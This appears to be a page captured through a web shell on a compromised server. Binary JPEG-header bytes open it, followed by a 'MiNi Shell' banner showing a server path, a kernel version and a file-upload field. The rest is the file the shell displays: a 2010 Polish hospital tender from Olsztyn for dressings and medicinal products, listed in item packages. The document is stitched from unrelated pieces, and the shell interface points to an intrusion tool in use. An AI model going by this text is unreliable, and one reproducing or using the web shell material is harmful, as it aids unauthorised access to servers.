JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100311/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100311/67530-N-2010.html

<p class="kh_header"><b>Olsztyn: Dostawa materiałów opatrunkowych i produktów leczniczych DZZ-382-15/10</b><br>
<b>Numer ogłoszenia: 67530 - 2010; data zamieszczenia: 11.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Szpital Zespolony , ul. Niepodległości 44, 10-045 Olsztyn, woj. warmińsko-mazurskie, tel. (089) 532 6349, faks (089) 5326349.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.olsztyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów opatrunkowych i produktów leczniczych DZZ-382-15/10.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa materiałów opatrunkowych i produktów leczniczych. Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1 do Specyfikacji..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku określonego  w pkt 3.2.a. Sytuacja podmiotowa wykonawcy: Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności. Wykonawca spełni warunek, jeżeli z dokumentów będzie wynikało, że wykonawca może prowadzić działalność w zakresie objętym przedmiotem zamówienia. Natomiast jeżeli nie będzie posiadał takiego uprawnienia - nie spełni warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku określonego  w pkt 3.2.b wymagane jest wykonanie w ciągu ostatnich 3 lat., a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia a jeżeli okres prowadzenia działalności jest krótszy  -  w tym okresie, przynajmniej 3 zamówień swoim rodzajem odpowiadających przedmiotowi zamówienia. z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniu dokumentów potwierdzających, że usługi te zostały wykonane należycie.  Wymagane jest wykazanie co najmniej 3 dostaw, polegających na  dostarczaniu sprzętu będącego przedmiotem niniejszego postępowania do placówek służby zdrowia. Każda z dostaw o wartości nie mniejszej niż 10 000,00 zł. brutto. Dla oceny spełnienia warunku zamawiający weźmie pod uwagę wykaz wg wzoru zał. nr 6 do SIWZ oraz potwierdzenia należytego ich wykonania (np. listy referencyjne).Potwierdzenia powinny być podpisane przez wykazanych odbiorców dostaw. 
 W przypadku składania oferty przez podmioty występujące wspólnie, w/w warunek muszą spełniać łącznie wszyscy wykonawcy. Ocena  spełnienia warunku nastąpi na podstawie przedstawionych  przez wykonawcę dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku określonego w pkt 3.2.c  wymagane jest  złożenie oświadczenia, w trybie art. 22 ust. 1 Ustawy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku określonego w pkt 3.2.c  wymagane jest  złożenie oświadczenia, w trybie art. 22 ust. 1 Ustawy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie niniejszego zamówienia. Wykonawca spełni warunek, jeżeli złoży oświadczenie w trybie art. 22 ust. 1 Ustawy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">a)Opis asortymentu - zamawiający wymaga załączenia właściwych stron katalogu zawierających parametry oferowanego asortymentu. Załączona do oferty właściwa strona katalogu powinna jednoznacznie wskazywać na oferowany asortyment poprzez jego oznaczenie za pomocą numeru lub symbolu katalogowego (funkcjonującego u wykonawcy), wskazane w formularzu cenowym.
b)Oświadczenie, że oferowany sprzęt posiada zaświadczenia podmiotu uprawnionego do kontroli jakości potwierdzające, że odpowiada on określonym przepisami prawa normom (certyfikat CE, zaświadczenie  dopuszczające oferowany opatrunek do stosowania w służbie zdrowia na terenie RP, wpis lub zgłoszenie do rejestru wyrobów medycznych i inne wymagane przepisami prawa dokumenty).
c)Próbki: część 1 poz. 1-13, 16-19, część 4 poz. 1 - 8, część 5 poz. 1 - 10, część 6 poz. 1 - 3, część 7 poz. 1 - 2, część 9 poz. 1 - 14.
d)Dokumenty potwierdzające sklasyfikowanie jako wyrób medyczny: 
w klasie IIa reguła 7: część 2, część 3
w klasie IIa reguła min. 6: część 4 poz. 1-7
e)Dla części 10 - karta charakterystyki produktu leczniczego</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.olsztyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Szpital Zespolony w Olsztynie
10-045 Olsztyn ul. Niepodległości 44
bud. Administracji pok.27.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.03.2010 godzina 10:00, miejsce: Miejski Szpital Zespolony w Olsztynie
10-045 Olsztyn ul. Niepodległości 44
bud. Administracji /sekretariat/.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PAKIET 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	opaska dziana 10cm x 4m	szt.	19000
2	opaska dziana 15cm x 4m	szt.	2800
3	opaska elastyczna 10cmx5m tkana z  zapinką wewnątrz indywidualnego opakowania	szt.	1700
4	opaska elastyczna 12cmx5m tkana z zapinką wewnątrz indywidualnego opakowania	szt.	100
5	opaska elastyczna 15cmx5m tkana z 2 zapinkami wewnątrz indywidualnego opakowania	szt.	6700
6	siatka elastyczna  w formie rękawa: ramię, dłoń-osoba dorosła, udo,stopa-dziecko; długość  25m ( w stanie rozciągniętym )	szt.	30
7	siatka elastyczna  w formie rękawa: głowa-osoba dorosła, klatka piersiowa-dziecko; długość  25m ( w stanie rozciągniętym )	szt.	40
8	opaska gipsowa szybkowiążąca 4-5min. 10cm x 3m	szt.	1100
9	opaska gipsowa szybkowiążąca 4-5min. 14-15cm x 3m	szt.	3900
10	opaska z waty pod gips 10cm x 3m	szt.	1000
11	opaska z waty pod gips 14-15cm x 3m	szt.	2700
12	rękaw podgipsowy, szerokość 10cm	mb	80
13	tampony celulozowe 40 x 50mm a 2x500	op.	36
14	wata celulozowa ( lignina ) kg arkusze 40 x 60cm +/- 3 cm	kg	3800
15	wata opatrunkowa 0,5 kg ( bawełniano-wiskozowa )	op.	40
16	kompresy chłonne 10 x 10-15cm	szt.	200
17	kompresy chłonne 10 x 20cm	szt.	600
18	kompresy chłonne 10 x 10-15cm, jałowe	szt.	1400
19	kompresy chłonne 10 x 20cm, jałowe	szt.	1000
 	poz.1-13,16-19 - próbki.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> PAKIET 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	gaza bawełniana 17-nitk. bielona  90cm w składkach po 100mb	mb	61000
2	gaza bawełniana 1m2 a 1szt.  jałowa  13-nitk.	szt.	11000
3	kompresy gazowe niejałowe 17-nitk. 12-war. 10 x10cm a 100szt.	op.	500
	kompresy gaz. niejał. 12-war.17-nitk., ze znacznikiem RTG 		
4	10cm x 10cm a 100szt.	op.	1500
5	kompresy gazowe niejałowe 13-nitk. 8-war. 5 x 5cm a 100szt.	op.	550
6	kompresy gazowe niejałowe 13-nitk. 8-war. 7,5 x 7,5cm a 100szt.	op.	1100
7	kompresy gazowe niejałowe 13-nitk. 8-war. 10 x 10cm a 100szt.	op.	1950
	serweta operacyjna niejałowa min. 17-nitk. 4-war., ze znacznikiem RTG 		
8	i tasiemką 45cm x 45cm	szt.	66000
	poz.1-8: klasa IIa reguła 7.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> PAKIET 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	tupfery gazowe fasolki  ze znacznikiem RTG 9,5 x 9,5cm a 200szt.	op.	60
2	tupfery gazowe fasolki ze znacznikiem RTG 15 x 15cm a 100szt.	op.	10
3	tupfery gazowe stożki 2-war. 12 x 12cm a 200szt.	op.	380
4	setony 1cm x 2m x 200szt.	op.	2
5	setony 2cm x 2m x 120szt.	op.	3
6	serweta operacyjna niejał. min. 17-nitk. 4-war., 30cm x 45cm	szt.	4000
	serweta operacyjna niejał. min. 17 nitk. 4-war., ze znacznikiem RTG 		
7	i tasiemką 75cm x 90cm	szt.	4400
	poz. 1-7: klasa IIa reguła 7.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> PAKIET 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	kompresy włókninowe min.30g niejałowe 5 x 5cm a 100szt.	op.	1000
2	kompresy włókninowe jałowe 5 x 5cm a 3szt. 	op.	260000
3	kompresy włókninowe jałowe 5 x 5cm a 5szt. 	op.	75000
4	kompresy włókninowe min.30g niejałowe 7,5 x 7,5cm a 100szt.	op.	900
5	kompresy włókninowe jałowe 7,5 x 7,5cm a 5szt. 	op.	40000
6	kompresy włókninowe jałowe 7,5 x 7,5cm a 2szt. z nacięciem  Y	op.	1000
7	kompresy włókninowe min.30g niejałowe 10 x 10cm a 100szt.	op.	8400
	przylepiec jałowy do zabezpieczenia wkłuć z zaokrąglonymi rogami, 		
8	z nacięciem i dodatkowym tamponem, typu VENA-PLAST; 5,1-6 x 7,6-8cm	szt.	66000
	poz.1-7: klasa IIa reguła min. 6; poz.1 - 8 - próbki.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> PAKIET 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	folia chirurgiczna bakteriobójcza: (44cm x 35cm) / (34cm x 35cm )	szt.	30
2	folia chirurgiczna: (60cm x 35cm ) / (35cm x 35cm )	szt.	530
3	folia chirurgiczna: (82cm x 45cm ) / (60cm x 45cm )	szt.	140
4	folia chirurgiczna: (29cm x 25cm ) / (19cm x 25cm )	szt.	660
5	opatr. foliowy do wkłuć centralnych; 10cm x 12cm	szt.	300
6	opatr. foliowy do wkłuć centralnych wzmocniony dookoła włókniną, owalny, ramka ułatwiająca aseptyczną aplikację, 2 włókninowe paski mocujące, odporny na działanie środków dezynfekujących zawierających alkohol, klej akrylowy hipoalergiczny; 8,5cm x 11,5cm	szt.	1000
7	opatr. foliowy do mocowania kaniul; 6cm x 7cm	szt.	300
	opatr. foliowy do mocowania kaniul -pediatryczny z zaokrąglonymi		
8	brzegami, z systemem ramki i paskami wzmacniającymi; 5cm x 5,7cm	szt.	1100
9	sterylne paski do zamykania ran 6 x 100/101mm ( 2x5 pasków w sasz.)	op.	85
10	sterylne paski do zamykania ran 6 x  75/76mm  ( 3 paski w sasz. )	op.	140
	poz.1-4:  ( całkowity rozmiar folii ) / ( powierzchnia przylepna )		
	poz.1-10 - próbki.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> PAKIET 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Chłonna jałowa gąbka hemostatyczna z żelatyny 		
1	70-80 x 50 x 10 mm	szt.	260
	Chłonna jałowa gąbka hemostatyczna z żelatyny 		
2	70 x 50 x 1 mm	szt.	100
	Chłonna jałowa gąbka hemostatyczna z żelatyny 		
3	w kształcie walca 80 x 30 mm	szt.	210
	poz.1-3 - próbki.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> PAKIET 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wchłanialny, jałowy hemostatyk powierzchniowy, ze 100%		
1	regenerowanej celulozy, w formie gazy; 50 x 75 mm	szt.	20
	Wchłanialny, jałowy hemostatyk powierzchniowy, ze 100%		
2	regenerowanej celulozy, w formie gazy; 100 x 200 mm	szt.	80
	poz.1-2 - próbki.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> PAKIET 8.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Opatrunek zbudowany z końskiego kolagenu pokrytego klejem fibrynowym ( fibrynogen i trombina pochodzenia ludzkiego ); 9,5x4,8x0,5 cm	szt.	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> PAKIET 9.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opatrunek do aktywnego oczyszczania ran przez 24h, wymagający		
1	aplikacji płynem Ringera 7,5cm x 7,5cm	szt.	96
	Opatrunek do aktywnego oczyszczania ran przez 24h, wymagający		
2	aplikacji płynem Ringera 10cm x 10cm	szt.	1440
3	Opatrunek hydrokoloidowy 5cm x 5 cm	szt.	500
4	Opatrunek hydrokoloidowy 7,5 cm x 7,5 cm	szt.	400
5	Opatrunek hydrokoloidowy 10cm x 10cm	szt.	900
6	Opatrunek hydrokoloidowy 15cm x 15cm	szt.	60
	Opatrunek hydrokoloidowy do zaopatrzenia okolicy		
7	krzyżowej 12cm x 18cm	szt.	144
	Opatrunek hydrokoloidowy do zaopatrzenia pięt, łokci 		
8	8cm x 12cm	szt.	240
9	Hydroaktywny opatrunek piankowy 10 x 10 cm	szt.	20
	Antybakteryjny opatrunek z maścią na bazie triglicerydów		
10	i srebrem metalicznym 10cm x 10cm	szt.	480
11	Folia - błona poliuretanowa 10cm x 15cm	szt.	960
12	Opatrunek z włókien alginianów wapnia 10cm x 10cm	szt.	360
13	Opatrunek hydrożelowy 10cm x 10cm	szt.	360
	Opatrunek maściowy złożony z siatki bawełnianej impregnowanej		
14	maścią neutralną na bazie triglicerydów 10cm x 10cm	szt.	100
	poz.1-14 - próbki.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
